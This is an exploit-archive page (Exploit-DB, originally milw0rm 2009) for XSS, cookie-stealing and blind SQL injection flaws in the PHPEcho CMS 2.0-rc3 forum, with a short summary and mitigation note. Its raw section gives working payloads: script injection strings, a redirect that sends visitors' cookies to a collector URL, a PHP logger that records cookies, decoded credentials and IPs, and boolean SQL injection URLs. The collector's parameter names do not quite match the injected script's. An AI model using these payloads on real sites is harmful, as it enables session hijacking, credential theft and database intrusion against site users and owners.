header-logo
Suggest Exploit
vendor:
CMS
by:
Jose Luis Gongora Fernandez (a.k.a) JosS
5.5
CVSS
MEDIUM
XSS Cookie Stealing / Blind
79
CWE
Product Name: CMS
Affected Version From: 2.0-rc3
Affected Version To: 2.0-rc3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability

The PHPEcho CMS 2.0-rc3 (forum) allows for the insertion of JavaScript and HTML code, which can lead to XSS attacks. Additionally, there is a vulnerability that allows for the stealing of cookies. The PoC for XSS is the insertion of JavaScript code or HTML code. The PoC for cookie stealing is a script that redirects the user to a specified URL and includes their cookie information. There is also a blind vulnerability that allows for the execution of SQL queries based on a true or false condition. The PoC for this blind vulnerability includes testing the version number of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate any data that is being displayed or stored. Additionally, it is important to keep the CMS up to date with the latest patches and security updates.
Source

Exploit-DB raw data:

PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- download: http://sourceforge.net/project/showfiles.php?group_id=186100

~ [XSS]

  The forum allowed insert javascript code and html code.

  PoC:
  "><h1>0wned</h1>
  "><script>alert("JosS b0x");</script>
  
  -----------  

  Cookie Stealing:
  <script>window.location=Â’http://127.0.0.1/stealing.php?cookie=Â’+document.cookie</script>

  stealing.php
  <?php
  $archivo = fopen('log.htm','a');
  $cookie = $_GET['c'];
  $usuario = $_GET['id']; 
  $ip = getenv ('REMOTE_ADDR');
  $re = $HTTPREFERRER;

  $fecha=date("j F, Y, g:i a");
  fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> 

  IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>');
  fclose($archivo);
  ?>

~ [BLIND]

  PoC:
  /index.php?module=forum&show=thread&id=1 and 1=2 [False]
  /index.php?module=forum&show=thread&id=1 and 1=1 [True]

  /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5
  /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4



__h0__

# milw0rm.com [2009-06-24]